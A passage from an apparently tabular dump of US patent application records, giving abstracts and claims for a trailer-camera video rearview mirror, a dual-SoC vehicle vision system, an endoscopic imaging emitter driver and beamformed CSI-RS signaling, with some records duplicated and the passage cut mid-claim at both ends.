system of claim 1, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the interior portion of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element. 11. The video mirror system of claim 10, wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 12. The video mirror system of claim 1, wherein the interior portion of the vehicle comprises an in-cabin surface of a windshield of the vehicle. 13. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an in-cabin surface of a windshield of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, displays video images derived from image data captured by the trailer-mounted rear viewing camera; and wherein said video mirror system, responsive to determination of hitching to the vehicle of the trailer with the trailer-mounted rear viewing camera, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. 14. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, said video display screen displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera. 15. The video mirror system of claim 13, wherein, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, said video display screen displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 16. The video mirror system of claim 13, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 17. The video mirror system of claim 13, wherein said mirror head and said transflective mirror reflective element are adjustable relative to the windshield of the vehicle between (i) a mirror mode orientation, where said video mirror system operates in the mirror mode and the driver of the vehicle views rearward of the vehicle via said transflective mirror reflective element, and (ii) a display mode orientation, where said video mirror system operates in the display mode and said video display screen is activated and the driver of the vehicle views displayed video images through said transflective mirror reflective element, and wherein said mirror head and said transflective mirror reflective element pivot about a horizontal pivot axis between the mirror mode orientation and the display mode orientation. 18. A video mirror system for a vehicle, said video mirror system comprising:
an interior rearview mirror assembly comprising a mirror head, said mirror head accommodating a transflective mirror reflective element; wherein said interior rearview mirror assembly is mounted at an interior portion of a vehicle equipped with said video mirror system; a display device comprising a video display screen disposed in said mirror head and accommodated behind said transflective mirror reflective element, said transflective mirror reflective element comprising a transflective mirror reflector; wherein said video display screen, when activated, displays video images viewable through said transflective mirror reflective element, and wherein said video display screen, when not activated, is covert behind said transflective mirror reflective element; a vehicle-mounted rear viewing camera disposed at a rear portion of the vehicle and having a field of view at least rearward of the vehicle; a trailer-mounted rear viewing camera disposed at a trailer that is configured to be hitched to the vehicle and that has a field of view at least rearward of the trailer; wherein said video mirror system operates in a mirror mode or a display mode responsive to actuation of a user input by a driver of the vehicle; wherein, when said video mirror system operates in the mirror mode, said video display screen is not activated and said transflective mirror reflector of said transflective mirror reflective element provides a mirror-reflected rearward view for the driver of the vehicle; wherein, when said video mirror system operates in the display mode, said video display screen is activated and displays video images through said transflective mirror reflector of said transflective mirror reflective element that are viewable by the driver viewing said transflective mirror reflective element; wherein said video display screen, when said video mirror system is operating in the display mode, and with no trailer hitched to the vehicle, displays video images derived from image data captured by the vehicle-mounted rear viewing camera; wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a forward gear, displays video images derived from captured image data at an upper region of the field of view of the trailer-mounted rear viewing camera; and wherein said video display screen, when said video mirror system is operating in the display mode, and with the trailer with the trailer-mounted rear viewing camera hitched to the vehicle, and responsive to the vehicle shifting to a reverse gear, displays video images derived from captured image data at a lower region of the field of view of the trailer-mounted rear viewing camera. 19. The video mirror system of claim 18, wherein said display device is in wireless communication with said trailer-mounted rear viewing camera. 20. The video mirror system of claim 19, wherein said display device, responsive to receipt of a wireless communication from said trailer-mounted rear viewing camera indicative of the trailer with the trailer-mounted rear viewing camera being hitched to the vehicle, automatically switches to the display mode and said video display screen displays video images derived from image data captured by the trailer-mounted rear viewing camera. | 2,400 |
9,107 | 9,107 | 15,421,483 | 2,486 | A vision system for a vehicle includes at least one camera disposed at a vehicle and having an image sensor operable to capture image data. A display is operable to display video images for viewing by a driver of the vehicle during normal operation of the vehicle. A first system on chip (SoC) receives captured image data and processes the received captured image data for machine vision. The first SoC, responsive to image processing of the received captured image data, generates an output for a driver assistance system of the vehicle. A second system on chip (SoC) receives captured image data and communicates the image data to the display. | 1. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; a first system on a chip (SoC) that includes an image signal processor that receives image data captured by said camera and converts the received image data to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; a second system on a chip (SoC) that receives image data captured by said camera and communicates unconverted image data to said display; and wherein said display displays images derived from the unconverted image data received from said second SoC. 2. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates video images in a raw image format to said display. 3. The vision system of claim 2, wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera. 4. The vision system of claim 3, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 5. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates the image data upon initial startup of the vehicle and said camera. 6. The vision system of claim 1, wherein said second SoC converts raw video image data to an output format suitable for display and communicates the output to said display. 7. The vision system of claim 1, wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 8. The vision system of claim 7, wherein said second SoC applies digital sharpening, enhanced contrast and enhanced saturated color to the captured image data for generating enhanced video images for said display. 9. The vision system of claim 1, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 10. The vision system of claim 1, wherein the image data communicated by said second SoC is communicated to said display via a communication bus of the vehicle. 11. The vision system of claim 1, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. 12. The vision system of claim 1, wherein said at least one camera comprises a plurality of cameras disposed at the vehicle. 13. The vision system of claim 1, wherein said camera comprises a smart camera module comprising said image sensor, said first SoC and said second SoC. 14. The vision system of claim 13, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 15. The vision system of claim 13, wherein said second SoC communicates video images to said display via a communication bus of the vehicle. 16. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein said camera comprises a second system on a chip (SoC) that communicates unconverted image data captured by said camera to said display; wherein said display displays images derived from the unconverted image data received from said second SoC; and wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 17. The vision system of claim 16, wherein said second SoC communicates video images in a raw image format upon initial startup of the vehicle and said camera. 18. The vision system of claim 17, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 19. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle; wherein said camera comprises a second system on a chip (SoC) that, responsive to said camera capturing image data, communicates video images in a raw image format to said display; wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera; wherein the image data communicated by said second SoC is communicated to said display via the communication bus of the vehicle; and wherein said display displays images derived from the communicated video images received from said second SoC. 20. The vision system of claim 19, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. | A vision system for a vehicle includes at least one camera disposed at a vehicle and having an image sensor operable to capture image data. A display is operable to display video images for viewing by a driver of the vehicle during normal operation of the vehicle. A first system on chip (SoC) receives captured image data and processes the received captured image data for machine vision. The first SoC, responsive to image processing of the received captured image data, generates an output for a driver assistance system of the vehicle. A second system on chip (SoC) receives captured image data and communicates the image data to the display.1. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; a first system on a chip (SoC) that includes an image signal processor that receives image data captured by said camera and converts the received image data to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; a second system on a chip (SoC) that receives image data captured by said camera and communicates unconverted image data to said display; and wherein said display displays images derived from the unconverted image data received from said second SoC. 2. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates video images in a raw image format to said display. 3. The vision system of claim 2, wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera. 4. The vision system of claim 3, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 5. The vision system of claim 1, wherein said second SoC, responsive to receiving captured image data, communicates the image data upon initial startup of the vehicle and said camera. 6. The vision system of claim 1, wherein said second SoC converts raw video image data to an output format suitable for display and communicates the output to said display. 7. The vision system of claim 1, wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 8. The vision system of claim 7, wherein said second SoC applies digital sharpening, enhanced contrast and enhanced saturated color to the captured image data for generating enhanced video images for said display. 9. The vision system of claim 1, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 10. The vision system of claim 1, wherein the image data communicated by said second SoC is communicated to said display via a communication bus of the vehicle. 11. The vision system of claim 1, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. 12. The vision system of claim 1, wherein said at least one camera comprises a plurality of cameras disposed at the vehicle. 13. The vision system of claim 1, wherein said camera comprises a smart camera module comprising said image sensor, said first SoC and said second SoC. 14. The vision system of claim 13, wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle. 15. The vision system of claim 13, wherein said second SoC communicates video images to said display via a communication bus of the vehicle. 16. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein said camera comprises a second system on a chip (SoC) that communicates unconverted image data captured by said camera to said display; wherein said display displays images derived from the unconverted image data received from said second SoC; and wherein video images communicated by said second SoC are based on captured image data that is not processed by said first SoC. 17. The vision system of claim 16, wherein said second SoC communicates video images in a raw image format upon initial startup of the vehicle and said camera. 18. The vision system of claim 17, wherein said second SoC is able to communicate video images upon initial startup of the vehicle and said camera while said first SoC is warming up and not yet able to process the converted image data. 19. A vision system for a vehicle, said vision system comprising:
a camera disposed at a vehicle and having a field of view exterior the vehicle, said camera comprising an image sensor, wherein said camera is operable to capture image data; a display disposed in the vehicle and operable to display video images for viewing by a driver of the vehicle during operation of the vehicle; wherein said camera comprises a first system on a chip (SoC) that includes an image signal processor that converts image data captured by said camera to a format suitable for machine vision processing; wherein said first SoC processes converted image data and, responsive to processing of the converted image data, generates an output for a driver assistance system of the vehicle; wherein the output of said first SoC is communicated to the driver assistance system via a communication bus of the vehicle; wherein said camera comprises a second system on a chip (SoC) that, responsive to said camera capturing image data, communicates video images in a raw image format to said display; wherein said second SoC communicates video images in the raw image format upon initial startup of the vehicle and said camera; wherein the image data communicated by said second SoC is communicated to said display via the communication bus of the vehicle; and wherein said display displays images derived from the communicated video images received from said second SoC. 20. The vision system of claim 19, wherein the driver assistance system comprises at least one of a backup assist system, an adaptive cruise control system, a headlamp control system and a lane departure warning system. | 2,400 |
9,108 | 9,108 | 15,855,915 | 2,482 | The disclosure relates to an endoscopic system that includes an image sensor, an emitter and an electromagnetic radiation driver. The image sensor includes a pixel array and is configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array. The pixel array includes a plurality of lines for reading out pixel data. The pixel array also has readout period that is the length of time for reading out all the plurality of lines of pixel data in the pixel array. The emitter is configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor. The electromagnetic radiation driver is configured to drive emissions by the emitter. The electromagnetic radiation driver includes a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor. | 1. An endoscopic system comprising:
an image sensor comprising a pixel array and configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array of the image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; an emitter configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor; and an electromagnetic radiation driver configured to drive emissions by the emitter, wherein the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor. 2. The endoscopic system of claim 1, further comprising a controller configured to control the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor. 3. The endoscopic system of claim 2, wherein the controller is further configured to determine a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 4. The endoscopic system of claim 2, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 5. The endoscopic system of claim 1, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the pixel readout length of the image sensor. 6. The endoscopic system of claim 1, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 7. The endoscopic system of claim 6, wherein the CMOS image sensor is monochromatic. 8. The endoscopic system of claim 6, wherein the CMOS image sensor is color filtered. 9. The endoscopic system of claim 1, wherein the emitter comprises one or more pulsing lasers. 10. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 11. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 12. The endoscopic system of claim 1, wherein the image sensor is a charge-coupled device (CCD) image sensor. 13. The endoscopic system of claim 12, wherein the CCD image sensor is monochromatic. 14. The endoscopic system of claim 12, wherein the CCD image sensor is color filtered. 15. The endoscopic system of claim 1, wherein the emitter emits a plurality of pulses of electromagnetic radiation, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 16. The endoscopic system of claim 1, wherein the system further comprises an endoscope comprising a lumen with a distal end, wherein the image sensor is located within the distal end of the lumen of the endoscope. 17. The endoscopic system of claim 1, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the line readout length. 18. A method for endoscopic imaging, the method comprising:
generating and reading out pixel data for an image based on electromagnetic radiation received by a pixel array of an image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; emitting electromagnetic radiation using an emitter; illuminating a scene observed by the image sensor with the electromagnetic radiation emitted from the emitter; and driving emission by the emitter using an electromagnetic radiation driver, the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor. 19. The method for endoscopic imaging of claim 18, the method further comprising controlling the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor using a controller. 20. The method for endoscopic imaging of claim 19, wherein the controller determines a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 21. The method for endoscopic imaging of claim 19, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 22. The method for endoscopic imaging of claim 18, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the jitter specification is less than or equal to the pixel readout length of the image sensor. 23. The method for endoscopic imaging of claim 18, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 24. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is monochromatic. 25. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is color filtered. 26. The method for endoscopic imaging of claim 18, wherein the emitter comprises one or more pulsing lasers. 27. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 28. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 29. The method for endoscopic imaging of claim 18, wherein the image sensor is a charge-coupled device (CCD) image sensor. 30. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is monochromatic. 31. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is color filtered. 32. The method for endoscopic imaging of claim 18, wherein method further comprises emitting a plurality of pulses of electromagnetic radiation with the emitter, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 33. The method for endoscopic imaging of claim 18, wherein the image sensor is located within a distal end of a lumen of an endoscope. 34. The method for endoscopic imaging of claim 18, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the jitter specification is less than or equal to the line readout length. | The disclosure relates to an endoscopic system that includes an image sensor, an emitter and an electromagnetic radiation driver. The image sensor includes a pixel array and is configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array. The pixel array includes a plurality of lines for reading out pixel data. The pixel array also has readout period that is the length of time for reading out all the plurality of lines of pixel data in the pixel array. The emitter is configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor. The electromagnetic radiation driver is configured to drive emissions by the emitter. The electromagnetic radiation driver includes a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor.1. An endoscopic system comprising:
an image sensor comprising a pixel array and configured to generate and read out pixel data for an image based on electromagnetic radiation received by the pixel array of the image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; an emitter configured to emit electromagnetic radiation for illumination of a scene observed by the image sensor; and an electromagnetic radiation driver configured to drive emissions by the emitter, wherein the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor. 2. The endoscopic system of claim 1, further comprising a controller configured to control the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor. 3. The endoscopic system of claim 2, wherein the controller is further configured to determine a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 4. The endoscopic system of claim 2, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 5. The endoscopic system of claim 1, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the pixel readout length of the image sensor. 6. The endoscopic system of claim 1, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 7. The endoscopic system of claim 6, wherein the CMOS image sensor is monochromatic. 8. The endoscopic system of claim 6, wherein the CMOS image sensor is color filtered. 9. The endoscopic system of claim 1, wherein the emitter comprises one or more pulsing lasers. 10. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 11. The endoscopic system of claim 1, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 12. The endoscopic system of claim 1, wherein the image sensor is a charge-coupled device (CCD) image sensor. 13. The endoscopic system of claim 12, wherein the CCD image sensor is monochromatic. 14. The endoscopic system of claim 12, wherein the CCD image sensor is color filtered. 15. The endoscopic system of claim 1, wherein the emitter emits a plurality of pulses of electromagnetic radiation, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 16. The endoscopic system of claim 1, wherein the system further comprises an endoscope comprising a lumen with a distal end, wherein the image sensor is located within the distal end of the lumen of the endoscope. 17. The endoscopic system of claim 1, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the electromagnetic radiation driver jitter specification is less than or equal to the line readout length. 18. A method for endoscopic imaging, the method comprising:
generating and reading out pixel data for an image based on electromagnetic radiation received by a pixel array of an image sensor, wherein the pixel array comprises a plurality of lines for reading out pixel data, and wherein a time length for reading out all the plurality of lines of pixel data in the pixel array comprises a readout period; emitting electromagnetic radiation using an emitter; illuminating a scene observed by the image sensor with the electromagnetic radiation emitted from the emitter; and driving emission by the emitter using an electromagnetic radiation driver, the electromagnetic radiation driver comprising a jitter specification that is less than or equal to about 10% to about 25% percent of the readout period of the pixel array of the image sensor. 19. The method for endoscopic imaging of claim 18, the method further comprising controlling the electromagnetic radiation driver to drive the emitter to generate one or more pulses of electromagnetic radiation between a readout period for the image sensor using a controller. 20. The method for endoscopic imaging of claim 19, wherein the controller determines a timing for signals to the electromagnetic radiation driver to pulse electromagnetic radiation for illuminating a scene in an endoscopic environment without overlapping into the readout period for the image sensor. 21. The method for endoscopic imaging of claim 19, wherein the readout period starts after reading out a row or column of optical black pixels and the readout period ends with the readout of a row or column of optical black pixels. 22. The method for endoscopic imaging of claim 18, wherein a time length for reading out pixel data for a single pixel is a pixel readout length, wherein the jitter specification is less than or equal to the pixel readout length of the image sensor. 23. The method for endoscopic imaging of claim 18, wherein the image sensor comprises a complementary metal-oxide-semiconductor (CMOS) image sensor. 24. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is monochromatic. 25. The method for endoscopic imaging of claim 23, wherein the CMOS image sensor is color filtered. 26. The method for endoscopic imaging of claim 18, wherein the emitter comprises one or more pulsing lasers. 27. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 1 microsecond or less. 28. The method for endoscopic imaging of claim 18, wherein the electromagnetic radiation driver jitter specification is about 50 nanoseconds or less. 29. The method for endoscopic imaging of claim 18, wherein the image sensor is a charge-coupled device (CCD) image sensor. 30. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is monochromatic. 31. The method for endoscopic imaging of claim 29, wherein the CCD image sensor is color filtered. 32. The method for endoscopic imaging of claim 18, wherein method further comprises emitting a plurality of pulses of electromagnetic radiation with the emitter, wherein each successive pulse is a different range of wavelengths of electromagnetic energy. 33. The method for endoscopic imaging of claim 18, wherein the image sensor is located within a distal end of a lumen of an endoscope. 34. The method for endoscopic imaging of claim 18, wherein a time length for reading out a single line of pixel data comprises a line readout length, wherein the jitter specification is less than or equal to the line readout length. | 2,400 |
9,109 | 9,109 | 16,067,929 | 2,469 | Techniques for measuring CSI (Channel State Information) based on beamformed CSI-RS having reduced overhead are discussed. One example embodiment configured to be employed in a UE (User Equipment) comprises a memory; and one or more processors configured to: process higher layer signaling indicating one or more CSI-RS resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission; decode one or more CSI-RSs from the indicated subset; and measure one or more CSI parameters based on the decoded one or more CSI-RSs. | 1-24. (canceled) 25. An apparatus configured to be employed in a User Equipment (UE), comprising:
a memory; and one or more processors configured to:
process higher layer signaling indicating one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks);
process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission;
decode one or more CSI-RSs from the indicated subset; and
measure one or more CSI parameters based on the decoded one or more CSI-RSs. 26. The apparatus of claim 25, wherein the one or more CSI-RS parameters comprises a frequency decimation factor equal to N, wherein N is an integer greater than 1, wherein the subset comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 27. The apparatus of claim 26, wherein the one or more CSI-RS parameters comprises one or more frequency shifts, wherein each frequency shift of the one or more frequency shifts is associated with at least one of the one or more CSI-RS APs. 28. The apparatus of claim 27, wherein the one or more frequency shifts comprises a common frequency shift associated with each of the one or more CSI-RS APs, wherein each set of N continuous PRBs comprises a single PRB that comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in that set of N continuous PRBs, and wherein the one or more processors are further configured to determine the single PRB of each set of N continuous PRBs based on the common frequency shift. 29. The apparatus of claim 27, wherein the one or more frequency shifts comprises a first frequency shift associated with a first set of CSI-RS APs of the one or more CSI-RS APs, and a distinct second frequency shift associated with a distinct second set of CSI-RS APs of the one or more CSI-RS APs. 30. The apparatus of claim 25, wherein the one or more CSI-RS parameters indicate the subset of the plurality of REs via a resource allocation indicating a subset of the plurality of continuous PRBs. 31. The apparatus of claim 25, wherein the additional higher layer signaling indicates at least one of a time measurement restriction or a frequency measurement restriction, and wherein the one or more processors are configured to measure the one or more CSI parameters based on the at least one of the time measurement restriction or the frequency measurement restriction. 32. The apparatus of claim 25, wherein the subset of the plurality of REs is time-dependent. 33. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a modulo base N of a CSI-RS transmission instance, wherein N is a frequency decimation factor indicated via the additional higher layer signaling. 34. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a pseudo-random sequence. 35. The apparatus of claim 34, wherein the pseudo-random sequence is based on an initialization seed indicated via RRC (Radio Resource Control) signaling. 36. The apparatus of claim 25, wherein the one or more CSI-RS APs comprises one, two, four, or eight CSI-RS APs. 37. An apparatus configured to be employed in an Evolved NodeB (eNB), comprising:
a memory; and one or more processors configured to:
generate a first set of higher layer signaling that configures at least one CSI (Channel State Information)-RS (Reference Signal) resource for a UE, wherein the at least one CSI-RS resource is associated with a plurality of REs (Resource Elements) over a plurality of continuous PRBs (physical resource blocks), and wherein each CSI-RS resource is associated with a CSI-RS pattern comprising a distinct RE for each of one or more CSI-RS APs (Antenna Ports) in each PRB of the plurality of continuous PRBs;
generate a second set of higher layer signaling that indicates a subset of the plurality of REs for a beamformed CSI-RS transmission;
encode a set of beamformed CSI-RS; and
map the set of beamformed CSI-RS to the subset of the plurality of REs. 38. The apparatus of claim 37, wherein the second set of higher layer signaling comprises a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset comprises, for each CSI-RS resource, one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 39. The apparatus of claim 38, wherein the second set of higher layer signaling indicates a frequency shift that indicates a single PRB of each set of N continuous PRBs comprises the one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs, and wherein the one or more processors are configured to map the set of beamformed CSI-RS to the single PRB of each set of N continuous PRBs based on the CSI-RS pattern associated with each CSI-RS resource. 40. The apparatus of claim 38, wherein the second set of higher layer signaling indicates at least a first frequency shift and a distinct second frequency shift, wherein the first frequency shift is associated with a first subset of the one or more CSI-RS APs, and wherein the second frequency shift is associated with a distinct second subset of the one or more CSI-RS APs. 41. The apparatus of claim 40, wherein each set of N continuous PRBs comprises a first PRB comprising the one RE for each CSI-RS APs of the first subset of the one or more CSI-RS APs, and comprises a distinct second PRB comprising the one RE for each CSI-RS APs of the distinct second subset of the one or more CSI-RS APs. 42. The apparatus of claim 37, wherein the subset is based at least in part on a CSI-RS transmission instance associated with the set of beamformed CSI-RS. 43. The apparatus of claim 37, wherein the second set of higher layer signaling indicates the subset of the plurality of REs via a resource allocation indicating one or more PRBs of the plurality of continuous PRBs. 44. The apparatus of claim 43, wherein the resource allocation indicates the one or more PRBs of the plurality of continuous PRBs via a bitmap. 45. A non-transitory machine readable medium comprising instructions that, when executed, cause a User Equipment (UE) to:
